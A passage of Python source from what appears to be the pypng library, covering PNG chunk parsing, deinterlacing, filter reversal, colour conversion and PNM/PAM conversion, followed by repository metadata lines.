vpr = self.width * self.planes
# Make a result array, and make it big enough. Interleaving
# writes to the output array randomly (well, not quite), so the
# entire output array must be in memory.
fmt = 'BH'[self.bitdepth > 8]
a = array(fmt, [0]*vpr*self.height)
source_offset = 0
for xstart, ystart, xstep, ystep in _adam7:
if xstart >= self.width:
continue
# The previous (reconstructed) scanline. None at the
# beginning of a pass to indicate that there is no previous
# line.
recon = None
# Pixels per row (reduced pass image)
ppr = int(math.ceil((self.width-xstart)/float(xstep)))
# Row size in bytes for this pass.
row_size = int(math.ceil(self.psize * ppr))
for y in range(ystart, self.height, ystep):
filter_type = raw[source_offset]
source_offset += 1
scanline = raw[source_offset:source_offset+row_size]
source_offset += row_size
recon = self.undo_filter(filter_type, scanline, recon)
# Convert so that there is one element per pixel value
flat = self.serialtoflat(recon, ppr)
if xstep == 1:
assert xstart == 0
offset = y * vpr
a[offset:offset+vpr] = flat
else:
offset = y * vpr + xstart * self.planes
end_offset = (y+1) * vpr
skip = self.planes * xstep
for i in range(self.planes):
a[offset+i:end_offset:skip] = \
flat[i::self.planes]
return a
def iterboxed(self, rows):
"""Iterator that yields each scanline in boxed row flat pixel
format. `rows` should be an iterator that yields the bytes of
each row in turn.
"""
def asvalues(raw):
"""Convert a row of raw bytes into a flat row. Result will
be a freshly allocated object, not shared with
argument.
"""
if self.bitdepth == 8:
return array('B', raw)
if self.bitdepth == 16:
raw = tostring(raw)
return array('H', struct.unpack('!%dH' % (len(raw)//2), raw))
assert self.bitdepth < 8
width = self.width
# Samples per byte
spb = 8//self.bitdepth
out = array('B')
mask = 2**self.bitdepth - 1
shifts = [self.bitdepth * i
for i in reversed(list(range(spb)))]
for o in raw:
out.extend([mask&(o>>i) for i in shifts])
return out[:width]
return map(asvalues, rows)
def serialtoflat(self, bytes, width=None):
"""Convert serial format (byte stream) pixel data to flat row
flat pixel.
"""
if self.bitdepth == 8:
return bytes
if self.bitdepth == 16:
bytes = tostring(bytes)
return array('H',
struct.unpack('!%dH' % (len(bytes)//2), bytes))
assert self.bitdepth < 8
if width is None:
width = self.width
# Samples per byte
spb = 8//self.bitdepth
out = array('B')
mask = 2**self.bitdepth - 1
shifts = list(map(self.bitdepth.__mul__, reversed(list(range(spb)))))
l = width
for o in bytes:
out.extend([(mask&(o>>s)) for s in shifts][:l])
l -= spb
if l <= 0:
l = width
return out
def iterstraight(self, raw):
"""Iterator that undoes the effect of filtering, and yields
each row in serialised format (as a sequence of bytes).
Assumes input is straightlaced. `raw` should be an iterable
that yields the raw bytes in chunks of arbitrary size.
"""
# length of row, in bytes
rb = self.row_bytes
a = array('B')
# The previous (reconstructed) scanline. None indicates first
# line of image.
recon = None
for some in raw:
a.extend(some)
while len(a) >= rb + 1:
filter_type = a[0]
scanline = a[1:rb+1]
del a[:rb+1]
recon = self.undo_filter(filter_type, scanline, recon)
yield recon
if len(a) != 0:
# :file:format We get here with a file format error:
# when the available bytes (after decompressing) do not
# pack into exact rows.
raise FormatError(
'Wrong size for decompressed IDAT chunk.')
assert len(a) == 0
def validate_signature(self):
"""If signature (header) has not been read then read and
validate it; otherwise do nothing.
"""
if self.signature:
return
self.signature = self.file.read(8)
if self.signature != _signature:
raise FormatError("PNG file has invalid signature.")
def preamble(self, lenient=False):
"""
Extract the image metadata by reading the initial part of
the PNG file up to the start of the ``IDAT`` chunk. All the
chunks that precede the ``IDAT`` chunk are read and either
processed for metadata or discarded.
If the optional `lenient` argument evaluates to `True`, checksum
failures will raise warnings rather than exceptions.
"""
self.validate_signature()
while True:
if not self.atchunk:
self.atchunk = self.chunklentype()
if self.atchunk is None:
raise FormatError(
'This PNG file has no IDAT chunks.')
if self.atchunk[1] == b'IDAT':
return
self.process_chunk(lenient=lenient)
def chunklentype(self):
"""Reads just enough of the input to determine the next
chunk's length and type, returned as a (*length*, *type*) pair
where *type* is a string. If there are no more chunks, ``None``
is returned.
"""
x = self.file.read(8)
if not x:
return None
if len(x) != 8:
raise FormatError(
'End of file whilst reading chunk length and type.')
length,type = struct.unpack('!I4s', x)
if length > 2**31-1:
raise FormatError('Chunk %s is too large: %d.' % (type,length))
return length,type
def process_chunk(self, lenient=False):
"""Process the next chunk and its data. This only processes the
following chunk types, all others are ignored: ``IHDR``,
``PLTE``, ``bKGD``, ``tRNS``, ``gAMA``, ``sBIT``, ``pHYs``.
If the optional `lenient` argument evaluates to `True`,
checksum failures will raise warnings rather than exceptions.
"""
type, data = self.chunk(lenient=lenient)
method = '_process_' + as_str(type)
m = getattr(self, method, None)
if m:
m(data)
def _process_IHDR(self, data):
# http://www.w3.org/TR/PNG/#11IHDR
if len(data) != 13:
raise FormatError('IHDR chunk has incorrect length.')
(self.width, self.height, self.bitdepth, self.color_type,
self.compression, self.filter,
self.interlace) = struct.unpack("!2I5B", data)
check_bitdepth_colortype(self.bitdepth, self.color_type)
if self.compression != 0:
raise Error("unknown compression method %d" % self.compression)
if self.filter != 0:
raise FormatError("Unknown filter method %d,"
" see http://www.w3.org/TR/2003/REC-PNG-20031110/#9Filters ."
% self.filter)
if self.interlace not in (0,1):
raise FormatError("Unknown interlace method %d,"
" see http://www.w3.org/TR/2003/REC-PNG-20031110/#8InterlaceMethods ."
% self.interlace)
# Derived values
# http://www.w3.org/TR/PNG/#6Colour-values
colormap = bool(self.color_type & 1)
greyscale = not (self.color_type & 2)
alpha = bool(self.color_type & 4)
color_planes = (3,1)[greyscale or colormap]
planes = color_planes + alpha
self.colormap = colormap
self.greyscale = greyscale
self.alpha = alpha
self.color_planes = color_planes
self.planes = planes
self.psize = float(self.bitdepth)/float(8) * planes
if int(self.psize) == self.psize:
self.psize = int(self.psize)
self.row_bytes = int(math.ceil(self.width * self.psize))
# Stores PLTE chunk if present, and is used to check
# chunk ordering constraints.
self.plte = None
# Stores tRNS chunk if present, and is used to check chunk
# ordering constraints.
self.trns = None
# Stores sbit chunk if present.
self.sbit = None
def _process_PLTE(self, data):
# http://www.w3.org/TR/PNG/#11PLTE
if self.plte:
warnings.warn("Multiple PLTE chunks present.")
self.plte = data
if len(data) % 3 != 0:
raise FormatError(
"PLTE chunk's length should be a multiple of 3.")
if len(data) > (2**self.bitdepth)*3:
raise FormatError("PLTE chunk is too long.")
if len(data) == 0:
raise FormatError("Empty PLTE is not allowed.")
def _process_bKGD(self, data):
try:
if self.colormap:
if not self.plte:
warnings.warn(
"PLTE chunk is required before bKGD chunk.")
self.background = struct.unpack('B', data)
else:
self.background = struct.unpack("!%dH" % self.color_planes,
data)
except struct.error:
raise FormatError("bKGD chunk has incorrect length.")
def _process_tRNS(self, data):
# http://www.w3.org/TR/PNG/#11tRNS
self.trns = data
if self.colormap:
if not self.plte:
warnings.warn("PLTE chunk is required before tRNS chunk.")
else:
if len(data) > len(self.plte)/3:
# Was warning, but promoted to Error as it
# would otherwise cause pain later on.
raise FormatError("tRNS chunk is too long.")
else:
if self.alpha:
raise FormatError(
"tRNS chunk is not valid with colour type %d." %
self.color_type)
try:
self.transparent = \
struct.unpack("!%dH" % self.color_planes, data)
except struct.error:
raise FormatError("tRNS chunk has incorrect length.")
def _process_gAMA(self, data):
try:
self.gamma = struct.unpack("!L", data)[0] / 100000.0
except struct.error:
raise FormatError("gAMA chunk has incorrect length.")
def _process_sBIT(self, data):
self.sbit = data
if (self.colormap and len(data) != 3 or
not self.colormap and len(data) != self.planes):
raise FormatError("sBIT chunk has incorrect length.")
def _process_pHYs(self, data):
# http://www.w3.org/TR/PNG/#11pHYs
self.phys = data
fmt = "!LLB"
if len(data) != struct.calcsize(fmt):
raise FormatError("pHYs chunk has incorrect length.")
self.x_pixels_per_unit, self.y_pixels_per_unit, unit = struct.unpack(fmt,data)
self.unit_is_meter = bool(unit)
def read(self, lenient=False):
"""
Read the PNG file and decode it. Returns (`width`, `height`,
`pixels`, `metadata`).
May use excessive memory.
`pixels` are returned in boxed row flat pixel format.
If the optional `lenient` argument evaluates to True,
checksum failures will raise warnings rather than exceptions.
"""
def iteridat():
"""Iterator that yields all the ``IDAT`` chunks as strings."""
while True:
try:
type, data = self.chunk(lenient=lenient)
except ValueError as e:
raise ChunkError(e.args[0])
if type == b'IEND':
# http://www.w3.org/TR/PNG/#11IEND
break
if type != b'IDAT':
continue
# type == b'IDAT'
# http://www.w3.org/TR/PNG/#11IDAT
if self.colormap and not self.plte:
warnings.warn("PLTE chunk is required before IDAT chunk")
yield data
def iterdecomp(idat):
"""Iterator that yields decompressed strings. `idat` should
be an iterator that yields the ``IDAT`` chunk data.
"""
# Currently, with no max_length parameter to decompress,
# this routine will do one yield per IDAT chunk: Not very
# incremental.
d = zlib.decompressobj()
# Each IDAT chunk is passed to the decompressor, then any
# remaining state is decompressed out.
for data in idat:
# :todo: add a max_length argument here to limit output
# size.
yield array('B', d.decompress(data))
yield array('B', d.flush())
self.preamble(lenient=lenient)
raw = iterdecomp(iteridat())
if self.interlace:
raw = array('B', itertools.chain(*raw))
arraycode = 'BH'[self.bitdepth>8]
# Like :meth:`group` but producing an array.array object for
# each row.
pixels = map(lambda *row: array(arraycode, row),
*[iter(self.deinterlace(raw))]*self.width*self.planes)
else:
pixels = self.iterboxed(self.iterstraight(raw))
meta = dict()
for attr in 'greyscale alpha planes bitdepth interlace'.split():
meta[attr] = getattr(self, attr)
meta['size'] = (self.width, self.height)
for attr in 'gamma transparent background'.split():
a = getattr(self, attr, None)
if a is not None:
meta[attr] = a
if self.plte:
meta['palette'] = self.palette()
return self.width, self.height, pixels, meta
def read_flat(self):
"""
Read a PNG file and decode it into flat row flat pixel format.
Returns (*width*, *height*, *pixels*, *metadata*).
May use excessive memory.
`pixels` are returned in flat row flat pixel format.
See also the :meth:`read` method which returns pixels in the
more stream-friendly boxed row flat pixel format.
"""
x, y, pixel, meta = self.read()
arraycode = 'BH'[meta['bitdepth']>8]
pixel = array(arraycode, itertools.chain(*pixel))
return x, y, pixel, meta
def palette(self, alpha='natural'):
"""Returns a palette that is a sequence of 3-tuples or 4-tuples,
synthesizing it from the ``PLTE`` and ``tRNS`` chunks. These
chunks should have already been processed (for example, by
calling the :meth:`preamble` method). All the tuples are the
same size: 3-tuples if there is no ``tRNS`` chunk, 4-tuples when
there is a ``tRNS`` chunk. Assumes that the image is colour type
3 and therefore a ``PLTE`` chunk is required.
If the `alpha` argument is ``'force'`` then an alpha channel is
always added, forcing the result to be a sequence of 4-tuples.
"""
if not self.plte:
raise FormatError(
"Required PLTE chunk is missing in colour type 3 image.")
plte = group(array('B', self.plte), 3)
if self.trns or alpha == 'force':
trns = array('B', self.trns or '')
trns.extend([255]*(len(plte)-len(trns)))
plte = list(map(operator.add, plte, group(trns, 1)))
return plte
def asDirect(self):
"""Returns the image data as a direct representation of an
``x * y * planes`` array. This method is intended to remove the
need for callers to deal with palettes and transparency
themselves. Images with a palette (colour type 3)
are converted to RGB or RGBA; images with transparency (a
``tRNS`` chunk) are converted to LA or RGBA as appropriate.
When returned in this format the pixel values represent the
colour value directly without needing to refer to palettes or
transparency information.
Like the :meth:`read` method this method returns a 4-tuple:
(*width*, *height*, *pixels*, *meta*)
This method normally returns pixel values with the bit depth
they have in the source image, but when the source PNG has an
``sBIT`` chunk it is inspected and can reduce the bit depth of
the result pixels; pixel values will be reduced according to
the bit depth specified in the ``sBIT`` chunk (PNG nerds should
note a single result bit depth is used for all channels; the
maximum of the ones specified in the ``sBIT`` chunk. An RGB565
image will be rescaled to 6-bit RGB666).
The *meta* dictionary that is returned reflects the `direct`
format and not the original source image. For example, an RGB
source image with a ``tRNS`` chunk to represent a transparent
colour, will have ``planes=3`` and ``alpha=False`` for the
source image, but the *meta* dictionary returned by this method
will have ``planes=4`` and ``alpha=True`` because an alpha
channel is synthesized and added.
*pixels* is the pixel data in boxed row flat pixel format (just
like the :meth:`read` method).
All the other aspects of the image data are not changed.
"""
self.preamble()
# Simple case, no conversion necessary.
if not self.colormap and not self.trns and not self.sbit:
return self.read()
x,y,pixels,meta = self.read()
if self.colormap:
meta['colormap'] = False
meta['alpha'] = bool(self.trns)
meta['bitdepth'] = 8
meta['planes'] = 3 + bool(self.trns)
plte = self.palette()
def iterpal(pixels):
for row in pixels:
row = [plte[x] for x in row]
yield array('B', itertools.chain(*row))
pixels = iterpal(pixels)
elif self.trns:
# It would be nice if there was some reasonable way
# of doing this without generating a whole load of
# intermediate tuples. But tuples does seem like the
# easiest way, with no other way clearly much simpler or
# much faster. (Actually, the L to LA conversion could
# perhaps go faster (all those 1-tuples!), but I still
# wonder whether the code proliferation is worth it)
it = self.transparent
maxval = 2**meta['bitdepth']-1
planes = meta['planes']
meta['alpha'] = True
meta['planes'] += 1
typecode = 'BH'[meta['bitdepth']>8]
def itertrns(pixels):
for row in pixels:
# For each row we group it into pixels, then form a
# characterisation vector that says whether each
# pixel is opaque or not. Then we convert
# True/False to 0/maxval (by multiplication),
# and add it as the extra channel.
row = group(row, planes)
opa = map(it.__ne__, row)
opa = map(maxval.__mul__, opa)
opa = list(zip(opa)) # convert to 1-tuples
yield array(typecode,
itertools.chain(*map(operator.add, row, opa)))
pixels = itertrns(pixels)
targetbitdepth = None
if self.sbit:
sbit = struct.unpack('%dB' % len(self.sbit), self.sbit)
targetbitdepth = max(sbit)
if targetbitdepth > meta['bitdepth']:
raise Error('sBIT chunk %r exceeds bitdepth %d' %
(sbit,self.bitdepth))
if min(sbit) <= 0:
raise Error('sBIT chunk %r has a 0-entry' % sbit)
if targetbitdepth == meta['bitdepth']:
targetbitdepth = None
if targetbitdepth:
shift = meta['bitdepth'] - targetbitdepth
meta['bitdepth'] = targetbitdepth
def itershift(pixels):
for row in pixels:
yield [p >> shift for p in row]
pixels = itershift(pixels)
return x,y,pixels,meta
def asFloat(self, maxval=1.0):
"""Return image pixels as per :meth:`asDirect` method, but scale
all pixel values to be floating point values between 0.0 and
*maxval*.
"""
x,y,pixels,info = self.asDirect()
sourcemaxval = 2**info['bitdepth']-1
del info['bitdepth']
info['maxval'] = float(maxval)
factor = float(maxval)/float(sourcemaxval)
def iterfloat():
for row in pixels:
yield [factor * p for p in row]
return x,y,iterfloat(),info
def _as_rescale(self, get, targetbitdepth):
"""Helper used by :meth:`asRGB8` and :meth:`asRGBA8`."""
width,height,pixels,meta = get()
maxval = 2**meta['bitdepth'] - 1
targetmaxval = 2**targetbitdepth - 1
factor = float(targetmaxval) / float(maxval)
meta['bitdepth'] = targetbitdepth
def iterscale():
for row in pixels:
yield [int(round(x*factor)) for x in row]
if maxval == targetmaxval:
return width, height, pixels, meta
else:
return width, height, iterscale(), meta
def asRGB8(self):
"""Return the image data as an RGB pixels with 8-bits per
sample. This is like the :meth:`asRGB` method except that
this method additionally rescales the values so that they
are all between 0 and 255 (8-bit). In the case where the
source image has a bit depth < 8 the transformation preserves
all the information; where the source image has bit depth
> 8, then rescaling to 8-bit values loses precision. No
dithering is performed. Like :meth:`asRGB`, an alpha channel
in the source image will raise an exception.
This function returns a 4-tuple:
(*width*, *height*, *pixels*, *metadata*).
*width*, *height*, *metadata* are as per the
:meth:`read` method.
*pixels* is the pixel data in boxed row flat pixel format.
"""
return self._as_rescale(self.asRGB, 8)
def asRGBA8(self):
"""Return the image data as RGBA pixels with 8-bits per
sample. This method is similar to :meth:`asRGB8` and
:meth:`asRGBA`: The result pixels have an alpha channel, *and*
values are rescaled to the range 0 to 255. The alpha channel is
synthesized if necessary (with a small speed penalty).
"""
return self._as_rescale(self.asRGBA, 8)
def asRGB(self):
"""Return image as RGB pixels. RGB colour images are passed
through unchanged; greyscales are expanded into RGB
triplets (there is a small speed overhead for doing this).
An alpha channel in the source image will raise an
exception.
The return values are as for the :meth:`read` method
except that the *metadata* reflect the returned pixels, not the
source image. In particular, for this method
``metadata['greyscale']`` will be ``False``.
"""
width,height,pixels,meta = self.asDirect()
if meta['alpha']:
raise Error("will not convert image with alpha channel to RGB")
if not meta['greyscale']:
return width,height,pixels,meta
meta['greyscale'] = False
typecode = 'BH'[meta['bitdepth'] > 8]
def iterrgb():
for row in pixels:
a = array(typecode, [0]) * 3 * width
for i in range(3):
a[i::3] = row
yield a
return width,height,iterrgb(),meta
def asRGBA(self):
"""Return image as RGBA pixels. Greyscales are expanded into
RGB triplets; an alpha channel is synthesized if necessary.
The return values are as for the :meth:`read` method
except that the *metadata* reflect the returned pixels, not the
source image. In particular, for this method
``metadata['greyscale']`` will be ``False``, and
``metadata['alpha']`` will be ``True``.
"""
width,height,pixels,meta = self.asDirect()
if meta['alpha'] and not meta['greyscale']:
return width,height,pixels,meta
typecode = 'BH'[meta['bitdepth'] > 8]
maxval = 2**meta['bitdepth'] - 1
maxbuffer = struct.pack('=' + typecode, maxval) * 4 * width
def newarray():
return array(typecode, maxbuffer)
if meta['alpha'] and meta['greyscale']:
# LA to RGBA
def convert():
for row in pixels:
# Create a fresh target row, then copy L channel
# into first three target channels, and A channel
# into fourth channel.
a = newarray()
pngfilters.convert_la_to_rgba(row, a)
yield a
elif meta['greyscale']:
# L to RGBA
def convert():
for row in pixels:
a = newarray()
pngfilters.convert_l_to_rgba(row, a)
yield a
else:
assert not meta['alpha'] and not meta['greyscale']
# RGB to RGBA
def convert():
for row in pixels:
a = newarray()
pngfilters.convert_rgb_to_rgba(row, a)
yield a
meta['alpha'] = True
meta['greyscale'] = False
return width,height,convert(),meta
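# --- Illustrative sketch (not part of the original module) ---
# Typical use of the Reader class documented above.  asDirect() resolves
# palettes and tRNS transparency so callers see plain channel values; the
# function name and filename are invented for the example.
def _example_read_png(filename='tiny.png'):
    r = Reader(filename=filename)
    width, height, rows, meta = r.asDirect()
    # rows is an iterator of boxed rows; materialise it for convenience.
    return width, height, [list(row) for row in rows], meta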
def check_bitdepth_colortype(bitdepth, colortype):
"""Check that `bitdepth` and `colortype` are both valid,
and specified in a valid combination. Returns if valid,
raise an Exception if not valid.
"""
if bitdepth not in (1,2,4,8,16):
raise FormatError("invalid bit depth %d" % bitdepth)
if colortype not in (0,2,3,4,6):
raise FormatError("invalid colour type %d" % colortype)
# Check indexed (palettized) images have 8 or fewer bits
# per pixel; check only indexed or greyscale images have
# fewer than 8 bits per pixel.
if colortype & 1 and bitdepth > 8:
raise FormatError(
"Indexed images (colour type %d) cannot"
" have bitdepth > 8 (bit depth %d)."
" See http://www.w3.org/TR/2003/REC-PNG-20031110/#table111 ."
% (bitdepth, colortype))
if bitdepth < 8 and colortype not in (0,3):
raise FormatError("Illegal combination of bit depth (%d)"
" and colour type (%d)."
" See http://www.w3.org/TR/2003/REC-PNG-20031110/#table111 ."
% (bitdepth, colortype))
def isinteger(x):
try:
return int(x) == x
except (TypeError, ValueError):
return False
# === Support for users without Cython ===
try:
pngfilters
except NameError:
class pngfilters(object):
def undo_filter_sub(filter_unit, scanline, previous, result):
"""Undo sub filter."""
ai = 0
            # Loop starts at index fu. Observe that the initial part
# of the result is already filled in correctly with
# scanline.
for i in range(filter_unit, len(result)):
x = scanline[i]
a = result[ai]
result[i] = (x + a) & 0xff
ai += 1
undo_filter_sub = staticmethod(undo_filter_sub)
def undo_filter_up(filter_unit, scanline, previous, result):
"""Undo up filter."""
for i in range(len(result)):
x = scanline[i]
b = previous[i]
result[i] = (x + b) & 0xff
undo_filter_up = staticmethod(undo_filter_up)
def undo_filter_average(filter_unit, scanline, previous, result):
"""Undo up filter."""
ai = -filter_unit
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = 0
else:
a = result[ai]
b = previous[i]
result[i] = (x + ((a + b) >> 1)) & 0xff
ai += 1
undo_filter_average = staticmethod(undo_filter_average)
def undo_filter_paeth(filter_unit, scanline, previous, result):
"""Undo Paeth filter."""
# Also used for ci.
ai = -filter_unit
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = c = 0
else:
a = result[ai]
c = previous[ai]
b = previous[i]
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
pr = a
elif pb <= pc:
pr = b
else:
pr = c
result[i] = (x + pr) & 0xff
ai += 1
undo_filter_paeth = staticmethod(undo_filter_paeth)
def convert_la_to_rgba(row, result):
for i in range(3):
result[i::4] = row[0::2]
result[3::4] = row[1::2]
convert_la_to_rgba = staticmethod(convert_la_to_rgba)
def convert_l_to_rgba(row, result):
"""Convert a grayscale image to RGBA. This method assumes
the alpha channel in result is already correctly
initialized.
"""
for i in range(3):
result[i::4] = row
convert_l_to_rgba = staticmethod(convert_l_to_rgba)
def convert_rgb_to_rgba(row, result):
"""Convert an RGB image to RGBA. This method assumes the
alpha channel in result is already correctly initialized.
"""
for i in range(3):
result[i::4] = row[i::3]
convert_rgb_to_rgba = staticmethod(convert_rgb_to_rgba)
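# --- Illustrative sketch (not part of the original module) ---
# Round trip for the filter helpers: filter a scanline with filter_scanline
# (defined above) and undo it with pngfilters.undo_filter_up.  It assumes
# the Cython and pure-Python pngfilters share the signatures shown above;
# the byte values are arbitrary and the filter unit is 3 (RGB).
def _example_filter_roundtrip():
    prev = array('B', [10, 10, 10, 20, 20, 20])
    line = array('B', [12, 11, 10, 22, 21, 20])
    filtered = filter_scanline(2, line, 3, prev)   # "up" filter, type byte first
    result = array('B', filtered[1:])              # copy without the filter-type byte
    pngfilters.undo_filter_up(3, filtered[1:], prev, result)
    return result == line                          # True: original scanline recovered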
# === Command Line Support ===
def read_pam_header(infile):
"""
Read (the rest of a) PAM header. `infile` should be positioned
immediately after the initial 'P7' line (at the beginning of the
second line). Returns are as for `read_pnm_header`.
"""
# Unlike PBM, PGM, and PPM, we can read the header a line at a time.
header = dict()
while True:
l = infile.readline().strip()
if l == b'ENDHDR':
break
if not l:
raise EOFError('PAM ended prematurely')
        if l.startswith(b'#'):
continue
l = l.split(None, 1)
if l[0] not in header:
header[l[0]] = l[1]
else:
header[l[0]] += b' ' + l[1]
required = [b'WIDTH', b'HEIGHT', b'DEPTH', b'MAXVAL']
WIDTH,HEIGHT,DEPTH,MAXVAL = required
present = [x for x in required if x in header]
if len(present) != len(required):
raise Error('PAM file must specify WIDTH, HEIGHT, DEPTH, and MAXVAL')
width = int(header[WIDTH])
height = int(header[HEIGHT])
depth = int(header[DEPTH])
maxval = int(header[MAXVAL])
if (width <= 0 or
height <= 0 or
depth <= 0 or
maxval <= 0):
raise Error(
'WIDTH, HEIGHT, DEPTH, MAXVAL must all be positive integers')
return 'P7', width, height, depth, maxval
def read_pnm_header(infile, supported=(b'P5', b'P6')):
"""
Read a PNM header, returning (format,width,height,depth,maxval).
`width` and `height` are in pixels. `depth` is the number of
channels in the image; for PBM and PGM it is synthesized as 1, for
PPM as 3; for PAM images it is read from the header. `maxval` is
synthesized (as 1) for PBM images.
"""
# Generally, see http://netpbm.sourceforge.net/doc/ppm.html
# and http://netpbm.sourceforge.net/doc/pam.html
# Technically 'P7' must be followed by a newline, so by using
# rstrip() we are being liberal in what we accept. I think this
# is acceptable.
type = infile.read(3).rstrip()
if type not in supported:
raise NotImplementedError('file format %s not supported' % type)
if type == b'P7':
# PAM header parsing is completely different.
return read_pam_header(infile)
# Expected number of tokens in header (3 for P4, 4 for P6)
expected = 4
pbm = (b'P1', b'P4')
if type in pbm:
expected = 3
header = [type]
# We have to read the rest of the header byte by byte because the
# final whitespace character (immediately following the MAXVAL in
# the case of P6) may not be a newline. Of course all PNM files in
# the wild use a newline at this point, so it's tempting to use
# readline; but it would be wrong.
def getc():
c = infile.read(1)
if not c:
raise Error('premature EOF reading PNM header')
return c
c = getc()
while True:
# Skip whitespace that precedes a token.
while c.isspace():
c = getc()
# Skip comments.
        while c == b'#':
while c not in b'\n\r':
c = getc()
if not c.isdigit():
raise Error('unexpected character %s found in header' % c)
# According to the specification it is legal to have comments
# that appear in the middle of a token.
# This is bonkers; I've never seen it; and it's a bit awkward to
# code good lexers in Python (no goto). So we break on such
# cases.
token = b''
while c.isdigit():
token += c
c = getc()
# Slight hack. All "tokens" are decimal integers, so convert
# them here.
header.append(int(token))
if len(header) == expected:
break
# Skip comments (again)
        while c == b'#':
            while c not in b'\n\r':
c = getc()
if not c.isspace():
raise Error('expected header to end with whitespace, not %s' % c)
if type in pbm:
# synthesize a MAXVAL
header.append(1)
depth = (1,3)[type == b'P6']
return header[0], header[1], header[2], depth, header[3]
def write_pnm(file, width, height, pixels, meta):
"""Write a Netpbm PNM/PAM file.
"""
bitdepth = meta['bitdepth']
maxval = 2**bitdepth - 1
# Rudely, the number of image planes can be used to determine
# whether we are L (PGM), LA (PAM), RGB (PPM), or RGBA (PAM).
planes = meta['planes']
# Can be an assert as long as we assume that pixels and meta came
# from a PNG file.
assert planes in (1,2,3,4)
if planes in (1,3):
if 1 == planes:
# PGM
# Could generate PBM if maxval is 1, but we don't (for one
# thing, we'd have to convert the data, not just blat it
# out).
fmt = 'P5'
else:
# PPM
fmt = 'P6'
header = '%s %d %d %d\n' % (fmt, width, height, maxval)
if planes in (2,4):
# PAM
# See http://netpbm.sourceforge.net/doc/pam.html
if 2 == planes:
tupltype = 'GRAYSCALE_ALPHA'
else:
tupltype = 'RGB_ALPHA'
header = ('P7\nWIDTH %d\nHEIGHT %d\nDEPTH %d\nMAXVAL %d\n'
'TUPLTYPE %s\nENDHDR\n' %
(width, height, planes, maxval, tupltype))
file.write(header.encode('ascii'))
# Values per row
vpr = planes * width
# struct format
fmt = '>%d' % vpr
if maxval > 0xff:
fmt = fmt + 'H'
else:
fmt = fmt + 'B'
for row in pixels:
file.write(struct.pack(fmt, *row))
file.flush()
def color_triple(color):
"""
Convert a command line colour value to a RGB triple of integers.
FIXME: Somewhere we need support for greyscale backgrounds etc.
"""
if color.startswith('#') and len(color) == 4:
return (int(color[1], 16),
int(color[2], 16),
int(color[3], 16))
if color.startswith('#') and len(color) == 7:
return (int(color[1:3], 16),
int(color[3:5], 16),
int(color[5:7], 16))
elif color.startswith('#') and len(color) == 13:
return (int(color[1:5], 16),
int(color[5:9], 16),
int(color[9:13], 16))
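# --- Illustrative sketch (not part of the original module) ---
# color_triple, above, accepts '#RGB', '#RRGGBB' and '#RRRRGGGGBBBB' forms;
# the colour values below are arbitrary examples.
def _example_color_triple():
    return (color_triple('#fff'),             # (15, 15, 15)
            color_triple('#ff0080'),          # (255, 0, 128)
            color_triple('#ffff00000000'))    # (65535, 0, 0)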
def _add_common_options(parser):
"""Call *parser.add_option* for each of the options that are
common between this PNG--PNM conversion tool and the gen
tool.
"""
parser.add_option("-i", "--interlace",
default=False, action="store_true",
help="create an interlaced PNG file (Adam7)")
parser.add_option("-t", "--transparent",
action="store", type="string", metavar="#RRGGBB",
help="mark the specified colour as transparent")
parser.add_option("-b", "--background",
action="store", type="string", metavar="#RRGGBB",
help="save the specified background colour")
parser.add_option("-g", "--gamma",
action="store", type="float", metavar="value",
help="save the specified gamma value")
parser.add_option("-c", "--compression",
action="store", type="int", metavar="level",
help="zlib compression level (0-9)")
return parser
def _main(argv):
"""
Run the PNG encoder with options from the command line.
"""
# Parse command line arguments
from optparse import OptionParser
version = '%prog ' + __version__
parser = OptionParser(version=version)
parser.set_usage("%prog [options] [imagefile]")
parser.add_option('-r', '--read-png', default=False,
action='store_true',
help='Read PNG, write PNM')
parser.add_option("-a", "--alpha",
action="store", type="string", metavar="pgmfile",
help="alpha channel transparency (RGBA)")
_add_common_options(parser)
(options, args) = parser.parse_args(args=argv[1:])
# Convert options
if options.transparent is not None:
options.transparent = color_triple(options.transparent)
if options.background is not None:
options.background = color_triple(options.background)
# Prepare input and output files
if len(args) == 0:
infilename = '-'
infile = sys.stdin
elif len(args) == 1:
infilename = args[0]
infile = open(infilename, 'rb')
else:
parser.error("more than one input file")
outfile = sys.stdout
if sys.platform == "win32":
import msvcrt, os
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
if options.read_png:
        # Decode PNG to PPM
png = Reader(file=infile)
width,height,pixels,meta = png.asDirect()
write_pnm(outfile, width, height, pixels, meta)
else:
# Encode PNM to PNG
format, width, height, depth, maxval = \
read_pnm_header(infile, (b'P5',b'P6',b'P7'))
# When it comes to the variety of input formats, we do something
# rather rude. Observe that L, LA, RGB, RGBA are the 4 colour
# types supported by PNG and that they correspond to 1, 2, 3, 4
# channels respectively. So we use the number of channels in
# the source image to determine which one we have. We do not
# care about TUPLTYPE.
greyscale = depth <= 2
pamalpha = depth in (2,4)
supported = [2**x-1 for x in range(1,17)]
try:
mi = supported.index(maxval)
except ValueError:
raise NotImplementedError(
'your maxval (%s) not in supported list %s' %
(maxval, str(supported)))
bitdepth = mi+1
writer = Writer(width, height,
greyscale=greyscale,
bitdepth=bitdepth,
interlace=options.interlace,
transparent=options.transparent,
background=options.background,
alpha=bool(pamalpha or options.alpha),
gamma=options.gamma,
compression=options.compression)
if options.alpha:
pgmfile = open(options.alpha, 'rb')
format, awidth, aheight, adepth, amaxval = \
read_pnm_header(pgmfile, 'P5')
        if amaxval != 255:
raise NotImplementedError(
'maxval %s not supported for alpha channel' % amaxval)
if (awidth, aheight) != (width, height):
raise ValueError("alpha channel image size mismatch"
" (%s has %sx%s but %s has %sx%s)"
% (infilename, width, height,
options.alpha, awidth, aheight))
writer.convert_ppm_and_pgm(infile, pgmfile, outfile)
else:
writer.convert_pnm(infile, outfile)
if __name__ == '__main__':
try:
_main(sys.argv)
except Error as e:
print(e, file=sys.stderr)
|
[
"entrpntr@gmail.com"
] |
entrpntr@gmail.com
|
52504bfe4f3f300a1e07ec19a204f2147359d96e
|
f1f0f4f856c496be221031da4b8f8ccbf9633263
|
/hello_world.py
|
f0956210847cd4ef3cc4710d6ae0fe61ffeca60f
|
[] |
no_license
|
guitartsword/robot-test
|
a4fe0d712e0015350faf3647bb84bdec94d00048
|
0ec83e7a46fbed9a4a2ff95cc5c8843205f96de1
|
refs/heads/main
| 2023-04-12T15:57:38.097123
| 2021-05-07T07:01:16
